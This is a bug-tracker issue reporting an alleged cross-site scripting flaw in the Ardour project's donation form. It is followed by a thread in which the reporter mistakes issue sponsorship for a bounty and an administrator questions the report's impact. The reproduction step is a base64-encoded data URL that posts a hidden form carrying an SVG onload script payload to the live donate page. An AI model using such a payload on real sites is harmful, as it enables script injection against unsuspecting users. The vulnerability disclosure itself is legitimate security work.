View Issue Details

ID: 0007660
Category: bugs
Last Update: 2018-10-25 18:56
Reporter: naveed78945124
Assigned To:
Reproducibility: always
Status: new
Resolution: open
Platform: kali
OS: kali linux
OS Version: kali 2.0
Product Version: 5.12
Fixed in Version:
Summary: 0007660: xss vulnerability
Description:
I have found an XSS vulnerability in your site.
I have pasted the URL to reproduce.
Paste the link into a web browser.
Click the XSS.
Steps To Reproduce:
data:Text/Html;Base64,PGZvcm0gYWN0aW9uPWh0dHA6Ly9jb21tdW5pdHkuYXJkb3VyLm9yZy9kb25hdGUyIG1ldGhvZD0iUE9TVCI+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ImN1cnJlbmN5IiB2YWx1ZT0iVVNEIj48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0iY3VycmVuY3kiIHZhbHVlPSImcXVvdDstLSEmZ3Q7Jmx0O1N2Zy9PbkxvYWQ9KGNvbmZpcm0pKDEpJmd0OyZxdW90OyI+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ImFtb3VudCIgdmFsdWU9IjI1Ij48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0ic3VibWl0IiB2YWx1ZT0iIj48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0iIiB2YWx1ZT0iIj48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9WFNTPjwvZm9ybT4=
Additional Information: https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
Tags: No tags attached.

Users sponsoring this issue
Sponsors List Total Sponsorship = US$ 250

2018-09-05 21:21: naveed78945124 (US$ 250)

Activities

naveed78945124

2018-09-05 21:12

reporter  

Capture2.PNG (88,813 bytes)

naveed78945124

2018-09-05 21:24

reporter   ~0020378

I don't know what is the meaning of "Users sponsoring this issue"?

timbyr

2018-09-08 01:32

developer   ~0020380

Sponsoring an issue is an indication of how much someone is willing to pay to see an issue fixed or functionality completed. It is an honesty system and is non-binding.

naveed78945124

2018-09-13 15:15

reporter   ~0020384

When do I get the sponsoring money?

Headwar

2018-09-21 09:30

reporter   ~0020391

Sponsoring is how much you are willing to pay for the issue to be fixed, not how much you will earn from reporting it.

x42

2018-10-25 18:56

administrator   ~0020418

What is the actual issue here?

Craft a dedicated link that makes a user believe he's going to donate to ardour.org. Make a user click on that link somehow, then gain access to the user's account at ardour.org or some other browser-tab information?

Issue History

Date Modified Username Field Change
2018-09-05 21:12 naveed78945124 New Issue
2018-09-05 21:12 naveed78945124 File Added: Capture2.PNG
2018-09-05 21:21 naveed78945124 Sponsorship Added naveed78945124: US$ 10000
2018-09-05 21:21 naveed78945124 Sponsorship Total 0 => 10000
2018-09-05 21:24 naveed78945124 Note Added: 0020378
2018-09-08 01:32 timbyr Note Added: 0020380
2018-09-11 11:15 naveed78945124 Sponsorship Updated naveed78945124: US$ 250
2018-09-11 11:15 naveed78945124 Sponsorship Total 10000 => 250
2018-09-13 15:15 naveed78945124 Note Added: 0020384
2018-09-21 09:30 Headwar Note Added: 0020391
2018-10-25 18:56 x42 Note Added: 0020418